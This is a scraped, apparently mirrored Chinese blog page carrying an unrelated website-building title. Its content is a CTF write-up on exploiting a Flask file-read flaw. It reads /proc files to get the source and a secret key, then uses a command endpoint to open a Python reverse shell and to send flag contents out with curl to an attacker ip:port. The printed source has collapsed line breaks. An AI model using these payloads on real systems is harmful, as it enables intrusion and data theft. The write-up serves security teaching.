当前位置: 首页 > news >正文

企业网站建设方式/企业营销型网站建设

企业网站建设方式,企业营销型网站建设,保山网站制作,美国做简历的网站读取源码,反弹shell 文章目录解题过程非预期预期解SECRET_KEYpython反弹shellcurl反弹shell参考链接解题过程 打开环境,输入随便啥东西,url会变化,已GET方式进行的传参url 尝试文件读取,../../../../etc/passwd&#…

读取源码,反弹shell

文章目录

    • 解题过程
      • 非预期
      • 预期解
        • SECRET_KEY
        • python反弹shell
        • curl反弹shell
    • 参考链接

解题过程

打开环境,输入随便啥东西,url会变化,已GET方式进行的传参url
尝试文件读取,../../../../etc/passwd,会下载一个图片,使用编辑器打开,证明是可以文件读取的

下载

非预期

直接读取flag文件,../../../../flag,23333333333

预期解

读取
/proc/self/environ
/proc/self/cmdline    

得到python2 app.py,读取源码

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllibapp = Flask(__name__)SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)@app.route('/')
def index():return render_template('search.html')@app.route('/page')
def page():url = request.args.get("url")try:if not url.lower().startswith("file"):res = urllib.urlopen(url)value = res.read()response = Response(value, mimetype='application/octet-stream')response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'return responseelse:value = "HACK ERROR!"except:value = "SOMETHING WRONG!"return render_template('search.html', res=value)@app.route('/no_one_know_the_manager')
def manager():key = request.args.get("key")print(SECRET_KEY)if key == SECRET_KEY:shell = request.args.get("shell")os.system(shell)res = "ok"else:res = "Wrong Key!"return resif __name__ == '__main__':app.run(host='0.0.0.0', port=8080)

分析一下:
首先是定义了SECRET_KEY,然后将其删除,但是没有关闭,所以还能够在/proc/self/fd/xxx里找到,而且本题含有文件读取漏洞,所以可以得到SECRET_KEY
/page下是定义了一个文件读取的功能
/no_one_know_the_manager下是传两个参数,如果key == SECRET_KEY,那么就可以执行命令,但是没有回显,可以用来反弹shell.

SECRET_KEY

读取/proc/self/fd/xxx,数字从一开始,到三的时候发现

在这里插入图片描述

lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=

python反弹shell

有了key值,就可使用python进行反弹shell
首先监听3333端口(port自定)

nc -lvp 3333/no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

反弹shell之后,cat即可
在这里插入图片描述

curl反弹shell

客户机监听端口3333

nc -lvp 3333no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=curl ip:port/`ls /|base64`no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=curl ip:port/`cat /flag|base64`

执行的命令分别是

ls /|base64
cat /flag|base64

使用`执行命令
在这里插入图片描述
再解码一次,得到flag
在这里插入图片描述

参考链接

  1. 反弹shell命令
http://www.lbrq.cn/news/826687.html

相关文章:

  • 河北交通建设投资集团公司网站/千峰培训可靠吗?
  • 太原网页设计师/seo技术学院
  • 企业自助建站软件/免费的api接口网站
  • 公司网站建设完成通知/seo优化按天扣费
  • 宜兴做网站的联系方式/市场seo是什么
  • 内容电商的网站如何做/发稿服务
  • 哈尔滨网站制作公司/seo免费诊断联系方式
  • 网站建设服务领域/公司网站优化
  • 怎么用新浪云做网站/网站优化排名软件网
  • 专业网站制作公司/商丘搜索引擎优化
  • 网站运营计划书/企业培训机构有哪些
  • 利为汇网站建设/国内最新消息新闻
  • 摄影网站建立/网络营销公司怎么注册
  • 金融网站可以做公安备案/推广关键词
  • 会展网站建设情况/html网页制作代码大全
  • linux系统网站建设/百度搜索热度指数
  • o2o网站建设如何/快速搭建网站的工具
  • 简单的网站/免费网站建设哪家好
  • 交通设施东莞网站建设/网络营销方案案例
  • 部门做网站优点/淘宝网店的seo主要是什么
  • 有做公司网站/上海快速排名优化
  • 深度开发/网店seo关键词
  • 老网站不要了做新站需要怎么处理/网络舆情管控
  • 常州网站开发公司/上海网络推广公司网站
  • 重庆网站开发公/网络游戏营销策略
  • 做网站要会写代码吗/济南做网站公司哪家好
  • 成都企业建站系统/今天新闻头条最新消息
  • 建站系统破解/网络推广怎么做?
  • 国内做博彩网站代理/石家庄seo结算
  • 洛阳网红打卡地/seo详细教程
  • 20250718-3-Kubernetes 应用程序生命周期管理-Pod对象:存在意义_笔记
  • 如何为“地方升学导向型”语校建模?Prompt 框架下的宇都宫日建工科专门学校解析(7 / 500)
  • 习题4.1 输出3个人的顺序
  • QML vscode语法高亮和颜色区分。
  • Android studio和gradle升级后的一些错误
  • 【FFmpeg 快速入门】本地播放器 项目